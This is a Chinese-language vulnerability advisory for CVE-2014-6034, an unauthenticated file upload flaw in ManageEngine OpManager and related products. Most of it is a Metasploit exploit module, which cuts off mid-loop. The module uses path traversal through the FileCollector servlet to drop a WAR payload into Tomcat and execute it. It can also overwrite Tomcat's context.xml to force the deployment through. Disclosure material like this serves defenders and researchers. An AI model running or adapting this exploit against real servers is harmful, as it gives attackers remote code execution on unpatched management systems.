发布日期：2014-09-27
更新日期：2014-10-08

受影响系统：

ManageEngine OpManager 8.8-11.3

描述：

---

BUGTRAQ  ID: 70167
CVE(CAN) ID: CVE-2014-6034

ManageEngine是企业级IT管理软件，包括网络管理、服务器、桌面和应用管理。

ManageEngine OpManager 8.8-11.3、ManageEngine Social IT Plus 11.0、ManageEngine IT360 10.4在实现上存在任意文件上传漏洞，攻击者可利用此漏洞上传任意代码并在Web服务器进程中运行。

<*来源：Pedro Ribeiro
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
+ 'Description' => %q{
+ This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
+ The vulnerability exists in the FileCollector servlet which accepts unauthenticated
+ file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on
+ version 11.0 of SocialIT for Windows and Linux.
+ },
+ 'Author' =>
+ [
+ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2014-6034' ],
+ [ 'OSVDB', 'TODO' ],
+ [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'java',
+ 'Arch' => ARCH_JAVA,
+ 'Targets' =>
+ [
+ [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sep 27 2014'))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptInt.new('SLEEP',
+ [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
+ ], self.class)
+ end
+
+ def check
+ res = send_request_cgi({
+ 'uri' => normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"),
+ 'method' => 'GET'
+ })
+
+ # A GET request on this servlet returns "405 Method not allowed"
+ if res and res.code == 405
+ return Exploit::CheckCode::Detected
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+
+ def upload_war_and_exec(try_again, app_base)
+ tomcat_path = '../../../tomcat/'
+ servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'
+
+ if try_again
+ # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration
+ # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.
+ # The file we are uploading has the same content apart from privileged="false" and lots of XML comments.
+ # After replacing the context.xml file let's upload the WAR again.
+ print_status("#{peer} - Replacing Tomcat context file")
+ send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>},
+ 'ctype' => 'application/xml',
+ 'vars_get' => {
+ 'regionID' => tomcat_path + "conf",
+ 'FILENAME' => "context.xml"
+ }
+ })
+ else
+ # We need to create the upload directories before our first attempt to upload the WAR.
+ print_status("#{peer} - Creating upload directories")
+ bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+ send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),
+ 'ctype' => 'application/xml',
+ 'vars_get' => {
+ 'regionID' => "",
+ 'FILENAME' => bogus_file
+ }
+ })
+ register_files_for_cleanup("state/archivedata/zip/" + bogus_file)
+ end
+
+ war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+
+ print_status("#{peer} - Uploading WAR file...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => war_payload,
+ 'ctype' => 'application/octet-stream',
+ 'vars_get' => {
+ 'regionID' => tomcat_path + "webapps",
+ 'FILENAME' => app_base + ".war"
+ }
+ })
+
+ # The server either returns a 500 error or a 200 OK when the upload is successful.
+ if res and (res.code == 500 or res.code == 200)
+ print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
+ " seconds for deployment")
+ sleep(datastore['SLEEP'])
+ else
+ fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
+ end
+
+ print_status("#{peer} - Executing payload, wait for session...")
+ send_request_cgi({
+ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+ 'method' => 'GET'
+ })
+ end
+
+
+ def exploit
+ app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+
+ upload_war_and_exec(false, app_base)
+ register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")
+
+ sleep_counter = 0
+ while not session_created?

建议：

---

厂商补丁：

ManageEngine
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.manageengine.com/products/opmanager/index.html

浏览次数：2227
严重程度：0（网友投票）